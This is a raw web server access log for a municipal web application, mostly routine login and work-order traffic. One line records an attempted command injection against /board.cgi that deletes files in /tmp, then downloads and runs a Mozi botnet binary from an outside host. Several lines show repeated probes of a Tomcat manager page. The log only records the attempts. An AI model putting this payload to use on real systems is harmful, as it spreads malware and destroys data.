181.212.42.153 - - [05/Mar/2025:16:01:18 -0300] "GET /cormun/servlet/prbanco?,MD,,gxPopupLevel%3D0%3B HTTP/1.1" 200 6626
181.212.42.153 - - [05/Mar/2025:16:01:21 -0300] "GET /cormun/servlet/solicitudot?cf85b282645a0a44119ce928c153ad49bba1a8762326e55df205670b14de5b215b2f7aa060d785942a7a56a0d7d8a1653e8b81fdb9232b3891e99c3fce54a71e,gx-no-cache=1741201376131 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:01:22 -0300] "GET /cormun/servlet/solicitudot?cf85b282645a0a44119ce928c153ad498992186d8fe085f7f556601e2250ab92,gx-no-cache=1741201377029 HTTP/1.1" 200 53
181.212.42.153 - - [05/Mar/2025:16:01:27 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1741201382114 HTTP/1.1" 200 255
181.212.42.153 - - [05/Mar/2025:16:01:28 -0300] "GET /cormun/servlet/solicitudot?cf85b282645a0a44119ce928c153ad49b5d34fef76dd8c6bb7a7954352073c77504198304eefd0eb02f5db18f8f4bf589962b662e8ae434e1f77063e51f80b7d71bb7c018a6cd41d4d31ea8c67e546c5903ee01a115c4950c68a692023d8f95a9a80d65a5bb94c633b0d1cfbefe1a7d4c1956acb4de2abfabd3e1d26d98499ecefd5c2ecb3201cf80b0b0604789b3d09bac02bfb634737cd5a0fe68ed257332900a34126063e110fcc775b0db9e58850f5e65b68c8621b934498135140e043d582948a2a026f02daff96d8c03a140655eb113c07ebc0558a57fb82f5f82ab64664a7e369533c567c8a134e7541bdd511a0bcd2927a6eca5a2b982f62d2608d9598715d6621319825b4e9abeb4d6b87f18de56db404b395998648b0e75c066f7ae593c8554627c87b8cb58459c9c84f87e95fca91bfee7c07b86dbfcf0df9ecde0c67608cd71c41516f15999ceb7eb1ab87ee0046ed86d513a451b4d1f7dee76b1d6c04b46c501a51277cd907c5223bb0fdd2c4fe1c6f1d1362dad2e9f05a0ce3,gx-no-cache=1741201383698 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:01:30 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1741201385862 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:01:32 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1741201387235 HTTP/1.1" 200 1479
181.212.42.153 - - [05/Mar/2025:16:01:32 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1741201387259 HTTP/1.1" 200 38
181.212.42.153 - - [05/Mar/2025:16:01:57 -0300] "GET /cormun/servlet/solicitudot?cf85b282645a0a44119ce928c153ad49392231090963602108dffc3255fa297639a1a1559adfa82050f0438971f59c5d34290daee1ecf1929d5c293eeac350579355b6a35d8cbcf4e3449c305205f7cba80dd8da6b8c356007afc16bd949dff4a58e5bec75c71c2068f49384adaf8ff1,gx-no-cache=1741201412888 HTTP/1.1" 200 110
181.212.42.153 - - [05/Mar/2025:16:02:10 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1741201425692 HTTP/1.1" 200 97
179.57.78.71 - - [05/Mar/2025:16:02:15 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1725
181.212.42.153 - - [05/Mar/2025:16:02:17 -0300] "GET /cormun/servlet/solicitudot?cf85b282645a0a44119ce928c153ad490d1bd8eda34d18292f1f60306d4dc637d4d2412063082f24ce3bb638248d6577ea811ce92487dee37962985b80b594cea223719e920d44fa5b25f16c85de8050826e4bee041a9e73d9ca9e5df2b9b071c337590066cc94ec18395d553acf705b,gx-no-cache=1741201432686 HTTP/1.1" 200 29
181.212.42.153 - - [05/Mar/2025:16:02:17 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
179.57.78.71 - - [05/Mar/2025:16:02:20 -0300] "POST /cormun/servlet/hlogin?e7996335bfda1d46a92859c4ac856efd,gx-no-cache=1741201433699 HTTP/1.1" 200 90
179.57.78.71 - - [05/Mar/2025:16:02:20 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 968
181.212.42.153 - - [05/Mar/2025:16:02:20 -0300] "GET /cormun/servlet/solicitudot?cf85b282645a0a44119ce928c153ad499a77c10a500f72b9bdfefece3ba3cc52e2d17d3d24bc5ad0d82ca895bb66525f,gx-no-cache=1741201435245 HTTP/1.1" 200 30
179.57.78.71 - - [05/Mar/2025:16:02:20 -0300] "GET /cormun/servlet/solicitudot?INS,0,0,false, HTTP/1.1" 200 16207
181.212.42.153 - - [05/Mar/2025:16:02:23 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1741201438336 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:02:30 -0300] "POST /cormun/servlet/solicitudot?2741fd92d02858ac489b162003341005,INS,0,0,false,,gx-no-cache=1741201444688 HTTP/1.1" 200 93
181.212.42.153 - - [05/Mar/2025:16:02:30 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1006
181.212.42.153 - - [05/Mar/2025:16:02:31 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 8601
181.212.42.153 - - [05/Mar/2025:16:02:34 -0300] "POST /cormun/servlet/trsolicitudot?2741fd92d02858ac489b162003341005,gx-no-cache=1741201448933 HTTP/1.1" 200 107
181.212.42.153 - - [05/Mar/2025:16:02:34 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2025,21966, HTTP/1.1" 200 6073
181.212.42.153 - - [05/Mar/2025:16:02:36 -0300] "GET /cormun/servlet/solicitudotadjuntos?INS,2025,21966,,1, HTTP/1.1" 200 6017
181.212.42.153 - - [05/Mar/2025:16:02:36 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.42.153 - - [05/Mar/2025:16:02:36 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad4982d76bb4d359fd97750dd5af05a1e574b8af1ecc03cf4caf3a4a05576095bfed,gx-no-cache=1741201451645 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:02:36 -0300] "POST /cormun/servlet/solicitudotadjuntos?2741fd92d02858ac489b162003341005,INS,2025,21966,,1,,gx-no-cache=1741201451657 HTTP/1.1" 200 3896
181.212.42.153 - - [05/Mar/2025:16:02:57 -0300] "POST /cormun/servlet/solicitudotadjuntos?gx-no-cache=1741201472493 HTTP/1.1" 200 26
209.141.37.95 - - [05/Mar/2025:16:03:03 -0300] "GET /manager/html HTTP/1.1" 401 2474
181.212.42.153 - - [05/Mar/2025:16:03:11 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad49b76e5c5d9509836858ef093c7e7a6399,gx-no-cache=1741201485950 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:11 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad49b76e5c5d9509836858ef093c7e7a6399,gx-no-cache=1741201485958 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:11 -0300] "POST /cormun/servlet/solicitudotadjuntos?2741fd92d02858ac489b162003341005,INS,2025,21966,,1, HTTP/1.1" 200 116
181.212.42.153 - - [05/Mar/2025:16:03:11 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1024
181.212.42.153 - - [05/Mar/2025:16:03:11 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2025,21966, HTTP/1.1" 200 9111
179.57.78.71 - - [05/Mar/2025:16:03:12 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1741201485515 HTTP/1.1" 200 4160
179.57.78.71 - - [05/Mar/2025:16:03:12 -0300] "POST /cormun/servlet/solicitudot?e7996335bfda1d46a92859c4ac856efd,INS,0,0,false,,gx-no-cache=1741201485680 HTTP/1.1" 200 13019
181.212.42.153 - - [05/Mar/2025:16:03:13 -0300] "GET /cormun/servlet/solicitudotadjuntos?INS,2025,21966,,1, HTTP/1.1" 200 6017
181.212.42.153 - - [05/Mar/2025:16:03:13 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.42.153 - - [05/Mar/2025:16:03:13 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad4982d76bb4d359fd97750dd5af05a1e574b8af1ecc03cf4caf3a4a05576095bfed,gx-no-cache=1741201488928 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:14 -0300] "POST /cormun/servlet/solicitudotadjuntos?2741fd92d02858ac489b162003341005,INS,2025,21966,,1,,gx-no-cache=1741201488939 HTTP/1.1" 200 3896
181.212.42.153 - - [05/Mar/2025:16:03:15 -0300] "POST /cormun/servlet/solicitudotadjuntos?gx-no-cache=1741201490390 HTTP/1.1" 200 26
181.212.42.153 - - [05/Mar/2025:16:03:21 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad49b76e5c5d9509836858ef093c7e7a6399,gx-no-cache=1741201496318 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:21 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad49b76e5c5d9509836858ef093c7e7a6399,gx-no-cache=1741201496325 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:21 -0300] "POST /cormun/servlet/solicitudotadjuntos?2741fd92d02858ac489b162003341005,INS,2025,21966,,1, HTTP/1.1" 200 116
181.212.42.153 - - [05/Mar/2025:16:03:21 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1024
181.212.42.153 - - [05/Mar/2025:16:03:21 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2025,21966, HTTP/1.1" 200 9369
179.57.78.71 - - [05/Mar/2025:16:03:22 -0300] "GET /cormun/servlet/solicitudot?d5adb7b9d37d49b498c497c16338478af46ab224403a7dc89a335c4fe14b8fe762f48cf7a82705081535eaaefaab220a,gx-no-cache=1741201495904 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:23 -0300] "GET /cormun/servlet/solicitudotadjuntos?INS,2025,21966,,1, HTTP/1.1" 200 6017
181.212.42.153 - - [05/Mar/2025:16:03:23 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.42.153 - - [05/Mar/2025:16:03:24 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad4982d76bb4d359fd97750dd5af05a1e574b8af1ecc03cf4caf3a4a05576095bfed,gx-no-cache=1741201499018 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:24 -0300] "POST /cormun/servlet/solicitudotadjuntos?2741fd92d02858ac489b162003341005,INS,2025,21966,,1,,gx-no-cache=1741201499029 HTTP/1.1" 200 3896
181.212.42.153 - - [05/Mar/2025:16:03:25 -0300] "POST /cormun/servlet/solicitudotadjuntos?gx-no-cache=1741201500774 HTTP/1.1" 200 26
181.212.42.153 - - [05/Mar/2025:16:03:31 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad49b76e5c5d9509836858ef093c7e7a6399,gx-no-cache=1741201506590 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:31 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad49b76e5c5d9509836858ef093c7e7a6399,gx-no-cache=1741201506599 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:31 -0300] "POST /cormun/servlet/solicitudotadjuntos?2741fd92d02858ac489b162003341005,INS,2025,21966,,1, HTTP/1.1" 200 116
181.212.42.153 - - [05/Mar/2025:16:03:31 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1024
181.212.42.153 - - [05/Mar/2025:16:03:31 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2025,21966, HTTP/1.1" 200 9601
181.212.42.153 - - [05/Mar/2025:16:03:33 -0300] "GET /cormun/servlet/solicitudotadjuntos?INS,2025,21966,,1, HTTP/1.1" 200 6017
181.212.42.153 - - [05/Mar/2025:16:03:34 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.42.153 - - [05/Mar/2025:16:03:34 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad4982d76bb4d359fd97750dd5af05a1e574b8af1ecc03cf4caf3a4a05576095bfed,gx-no-cache=1741201509504 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:34 -0300] "POST /cormun/servlet/solicitudotadjuntos?2741fd92d02858ac489b162003341005,INS,2025,21966,,1,,gx-no-cache=1741201509524 HTTP/1.1" 200 3896
181.212.42.153 - - [05/Mar/2025:16:03:37 -0300] "POST /cormun/servlet/solicitudotadjuntos?gx-no-cache=1741201512538 HTTP/1.1" 200 26
181.212.42.153 - - [05/Mar/2025:16:03:45 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad49b76e5c5d9509836858ef093c7e7a6399,gx-no-cache=1741201520022 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:45 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad49b76e5c5d9509836858ef093c7e7a6399,gx-no-cache=1741201520031 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:45 -0300] "POST /cormun/servlet/solicitudotadjuntos?2741fd92d02858ac489b162003341005,INS,2025,21966,,1, HTTP/1.1" 200 116
181.212.42.153 - - [05/Mar/2025:16:03:45 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1024
181.212.42.153 - - [05/Mar/2025:16:03:45 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2025,21966, HTTP/1.1" 200 9886
181.212.42.153 - - [05/Mar/2025:16:03:49 -0300] "GET /cormun/servlet/solicitudotadjuntos?INS,2025,21966,,1, HTTP/1.1" 200 6017
181.212.42.153 - - [05/Mar/2025:16:03:49 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.42.153 - - [05/Mar/2025:16:03:49 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad4982d76bb4d359fd97750dd5af05a1e574b8af1ecc03cf4caf3a4a05576095bfed,gx-no-cache=1741201524915 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:50 -0300] "POST /cormun/servlet/solicitudotadjuntos?2741fd92d02858ac489b162003341005,INS,2025,21966,,1,,gx-no-cache=1741201524926 HTTP/1.1" 200 3896
181.212.42.153 - - [05/Mar/2025:16:03:51 -0300] "POST /cormun/servlet/solicitudotadjuntos?gx-no-cache=1741201526922 HTTP/1.1" 200 26
181.212.42.153 - - [05/Mar/2025:16:03:59 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad49b76e5c5d9509836858ef093c7e7a6399,gx-no-cache=1741201534234 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:59 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad49b76e5c5d9509836858ef093c7e7a6399,gx-no-cache=1741201534243 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:03:59 -0300] "POST /cormun/servlet/solicitudotadjuntos?2741fd92d02858ac489b162003341005,INS,2025,21966,,1, HTTP/1.1" 200 116
181.212.42.153 - - [05/Mar/2025:16:03:59 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1024
181.212.42.153 - - [05/Mar/2025:16:03:59 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2025,21966, HTTP/1.1" 200 10181
181.212.42.153 - - [05/Mar/2025:16:04:02 -0300] "GET /cormun/servlet/solicitudotadjuntos?INS,2025,21966,,1, HTTP/1.1" 200 6017
181.212.42.153 - - [05/Mar/2025:16:04:02 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.42.153 - - [05/Mar/2025:16:04:03 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad4982d76bb4d359fd97750dd5af05a1e574b8af1ecc03cf4caf3a4a05576095bfed,gx-no-cache=1741201538337 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:04:03 -0300] "POST /cormun/servlet/solicitudotadjuntos?2741fd92d02858ac489b162003341005,INS,2025,21966,,1,,gx-no-cache=1741201538348 HTTP/1.1" 200 3896
181.212.42.153 - - [05/Mar/2025:16:04:05 -0300] "POST /cormun/servlet/solicitudotadjuntos?gx-no-cache=1741201540206 HTTP/1.1" 200 26
179.57.78.71 - - [05/Mar/2025:16:04:09 -0300] "GET /cormun/servlet/solicitudot?d5adb7b9d37d49b498c497c16338478a14a7a22f46c6575a31344e964b63b136d4d6e57f01d9b0cc597333386fb42266,gx-no-cache=1741201543368 HTTP/1.1" 200 30
179.57.78.71 - - [05/Mar/2025:16:04:09 -0300] "GET /cormun/servlet/solicitudot?d5adb7b9d37d49b498c497c16338478a097f7c900b4597f5825adbdfaacbb91d,gx-no-cache=1741201543405 HTTP/1.1" 200 53
181.212.42.153 - - [05/Mar/2025:16:04:14 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad49b76e5c5d9509836858ef093c7e7a6399,gx-no-cache=1741201549431 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:04:14 -0300] "GET /cormun/servlet/solicitudotadjuntos?cf85b282645a0a44119ce928c153ad49b76e5c5d9509836858ef093c7e7a6399,gx-no-cache=1741201549439 HTTP/1.1" 200 30
181.212.42.153 - - [05/Mar/2025:16:04:14 -0300] "POST /cormun/servlet/solicitudotadjuntos?2741fd92d02858ac489b162003341005,INS,2025,21966,,1, HTTP/1.1" 200 116
181.212.42.153 - - [05/Mar/2025:16:04:14 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1024
181.212.42.153 - - [05/Mar/2025:16:04:15 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2025,21966, HTTP/1.1" 200 10415
181.212.42.153 - - [05/Mar/2025:16:04:18 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 8603
179.57.78.71 - - [05/Mar/2025:16:04:32 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1741201566088 HTTP/1.1" 200 255
179.57.78.71 - - [05/Mar/2025:16:04:32 -0300] "GET /cormun/servlet/solicitudot?d5adb7b9d37d49b498c497c16338478a25fdf2ac22d810be5eb5c1eca13c30654b50ff05a4811b14c9c9b87c0b59160262c8395750aa3fef443fe9c10202abb5c64d2a8d6b21efbba785a672a3faacb94280b90bae8d89091b439521074813f6fac4d8df05d0a4d0c4cd40c7dcc54c186ffedfd77bfc70004afc75b8d16fe569c2061c354932fbfdd2eb3e374b51a8a2a4a474115e21179b4cd12c74bdfd8864573310f7cf4d4924cbc36e394e26fc9e7fa4ed139a2f913bd1f225b640e5523782a2e762a326dd1bce7c2ef36baac61066b699accd84c91977cb666dd77d4d68f59febe12c2a4f8c7008a02ec7b7b306628b49b289b292ec91a4b53bd5717d25ebe21f131313d15ac10262dcce8279b0a97764bbe82086abb4c28f2e9a197bf18a73fb8f3409c9958b9b1b3d97f3dd64dffc654a30b7157d1104939d4b2760257d51855de635b1db8896ad5ec9fcafa276a35055925997577e192ed2b0e6d8bc2873085ff1936232d5863fdf7ab55d94b4c67a941122eaa61da6e1dc98344876,gx-no-cache=1741201566143 HTTP/1.1" 200 30
179.57.78.71 - - [05/Mar/2025:16:04:39 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1741201572723 HTTP/1.1" 200 30
179.57.78.71 - - [05/Mar/2025:16:04:45 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1741201579144 HTTP/1.1" 200 1481
179.57.78.71 - - [05/Mar/2025:16:04:45 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1741201579208 HTTP/1.1" 200 38
179.57.78.71 - - [05/Mar/2025:16:04:45 -0300] "GET /cormun/servlet/solicitudot?d5adb7b9d37d49b498c497c16338478a19c97a0defe426321212cb2af34e50f9b44e7cdbc0caac954e912601c20a7febdd1a3b0abcbbe84de76d0b95534b09c9969f06d69f1e7b2c3e367f27c26b96e2396d921b337ad7bec3b146fe806a13e65a39dbd3524449824299ed8ebcd87fc9,gx-no-cache=1741201579234 HTTP/1.1" 200 110
179.57.78.71 - - [05/Mar/2025:16:04:51 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1741201585121 HTTP/1.1" 200 97
117.209.25.200 - - [05/Mar/2025:16:05:00 -0300] "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.25.200:35725/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron HTTP/1.0" 404 979
179.57.78.71 - - [05/Mar/2025:16:05:02 -0300] "GET /cormun/servlet/solicitudot?d5adb7b9d37d49b498c497c16338478af92d952e71ff16f0b639db98ab4621ef22485bdc640400d5fa67138661dfcbaa6255ee213925e1657037ca22fb5932d4052e247386235573f010f8207ef6999d65ad92d4018ce6baddab25601a030ee7b7f22f1a84bf53258f768b3d443f07de313f429b545a07813ccb6c6a8c3fb2548ce2db783246b893ed4025bc97d46f914bbfea64558a5de84f03fe61fd975263,gx-no-cache=1741201596113 HTTP/1.1" 200 29
179.57.78.71 - - [05/Mar/2025:16:05:17 -0300] "GET /cormun/servlet/solicitudot?d5adb7b9d37d49b498c497c16338478af0f4124f803ca9b1296cd613f91a8e2ff8f43e09f265935366f5ad1450b1ae06,gx-no-cache=1741201611265 HTTP/1.1" 200 30
179.57.78.71 - - [05/Mar/2025:16:05:28 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1741201622296 HTTP/1.1" 200 30
179.57.78.71 - - [05/Mar/2025:16:05:37 -0300] "POST /cormun/servlet/solicitudot?e7996335bfda1d46a92859c4ac856efd,INS,0,0,false,,gx-no-cache=1741201631275 HTTP/1.1" 200 93
179.57.78.71 - - [05/Mar/2025:16:05:38 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1012
179.57.78.71 - - [05/Mar/2025:16:05:38 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 8844
190.95.1.187 - - [05/Mar/2025:16:06:33 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1715
190.95.1.187 - - [05/Mar/2025:16:06:33 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1726
190.95.1.187 - - [05/Mar/2025:16:06:38 -0300] "POST /cormun/servlet/hlogin?7275900026096eea4350a70ade39e159,gx-no-cache=1741201689261 HTTP/1.1" 200 90
190.95.1.187 - - [05/Mar/2025:16:06:38 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 947
190.95.1.187 - - [05/Mar/2025:16:06:38 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4015
179.57.78.71 - - [05/Mar/2025:16:06:41 -0300] "POST /cormun/servlet/trsolicitudot?e7996335bfda1d46a92859c4ac856efd,gx-no-cache=1741201695382 HTTP/1.1" 200 4870
179.57.78.71 - - [05/Mar/2025:16:06:42 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
179.57.78.71 - - [05/Mar/2025:16:06:42 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
179.57.78.71 - - [05/Mar/2025:16:06:42 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
179.57.78.71 - - [05/Mar/2025:16:06:42 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
179.57.78.71 - - [05/Mar/2025:16:06:42 -0300] "POST /cormun/servlet/trsolicitudot?e7996335bfda1d46a92859c4ac856efd,gx-no-cache=1741201695544 HTTP/1.1" 200 4619
190.95.1.187 - - [05/Mar/2025:16:06:43 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 8907
209.141.37.95 - - [05/Mar/2025:16:09:06 -0300] "GET /manager/html HTTP/1.1" 401 2474
179.57.78.71 - - [05/Mar/2025:16:10:12 -0300] "GET /cormun/servlet/solicitudot?INS,0,0,false, HTTP/1.1" 200 16205
209.141.37.95 - - [05/Mar/2025:16:15:05 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:16:21:06 -0300] "GET /manager/html HTTP/1.1" 401 2474
129.222.173.48 - - [05/Mar/2025:16:26:49 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1720
129.222.173.48 - - [05/Mar/2025:16:26:49 -0300] "GET /cormun/static/gxtimezone.js?85251 HTTP/1.1" 200 5781
129.222.173.48 - - [05/Mar/2025:16:26:49 -0300] "GET /cormun/static/gxcfg.js?2022112219184450 HTTP/1.1" 200 953
129.222.173.48 - - [05/Mar/2025:16:26:49 -0300] "GET /cormun/static/Resources/CormunLogin.png HTTP/1.1" 200 19132
129.222.173.48 - - [05/Mar/2025:16:26:49 -0300] "GET /cormun/static/messages.spa.js?85251 HTTP/1.1" 200 30736
129.222.173.48 - - [05/Mar/2025:16:26:49 -0300] "GET /cormun/static/hlogin.js?2022112219184458 HTTP/1.1" 200 2156
129.222.173.48 - - [05/Mar/2025:16:26:49 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?1759030 HTTP/1.1" 200 100853
129.222.173.48 - - [05/Mar/2025:16:26:50 -0300] "GET /cormun/static/gxgral.js?85251 HTTP/1.1" 200 384558
129.222.173.48 - - [05/Mar/2025:16:26:50 -0300] "GET /cormun/static/Resources/PXToolsLoginTop.png HTTP/1.1" 200 1337
129.222.173.48 - - [05/Mar/2025:16:26:50 -0300] "GET /cormun/static/Resources/PXToolsButtonBackground.png HTTP/1.1" 200 1176
129.222.173.48 - - [05/Mar/2025:16:26:50 -0300] "GET /cormun/static/Resources/PXToolsLoginBackground.png HTTP/1.1" 200 1164
129.222.173.48 - - [05/Mar/2025:16:26:50 -0300] "GET /cormun/static/Resources/PXToolsButtonRight.png HTTP/1.1" 200 1294
129.222.173.48 - - [05/Mar/2025:16:26:50 -0300] "GET /cormun/static/Resources/PXToolsButtonLeft.png HTTP/1.1" 200 1310
129.222.173.48 - - [05/Mar/2025:16:26:50 -0300] "GET /cormun/static/Resources/PXToolsLoginBottom.png HTTP/1.1" 200 1389
129.222.173.48 - - [05/Mar/2025:16:26:50 -0300] "GET /cormun/static/Resources/indicator.gif HTTP/1.1" 200 1553
129.222.173.48 - - [05/Mar/2025:16:26:50 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1731
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "POST /cormun/servlet/hlogin?15014107f78dcdb0c7c250e1515b3062,gx-no-cache=1741202906138 HTTP/1.1" 200 90
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/hpexe_link.js?20221129847423 HTTP/1.1" 200 625
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/gxcfg.js?20221129847421 HTTP/1.1" 200 953
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?8354383 HTTP/1.1" 200 100853
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3935
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/Shared/jqueryui/jquery-ui.min.css?1345370 HTTP/1.1" 200 30288
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/SmoothNavMenu/resources/ddsmoothmenu.css?1112540 HTTP/1.1" 200 2223
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/gxcfg.js?20201215495537 HTTP/1.1" 200 953
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/SmoothNavMenu/resources/ddsmoothmenu-v.css?1112540 HTTP/1.1" 200 1188
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/scaMessage/css/jquery.pnotify.default.css?1816380 HTTP/1.1" 200 1707
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_autoreload.js HTTP/1.1" 200 1762
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_grid.js HTTP/1.1" 200 7559
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_windows.js HTTP/1.1" 200 15249
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_cookies.js HTTP/1.1" 200 792
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_griddivfix.js HTTP/1.1" 200 6946
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_menus.js HTTP/1.1" 200 1286
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?14345360 HTTP/1.1" 200 100853
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_menudivfix.js HTTP/1.1" 200 333
129.222.173.48 - - [05/Mar/2025:16:26:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_link.js HTTP/1.1" 200 5671
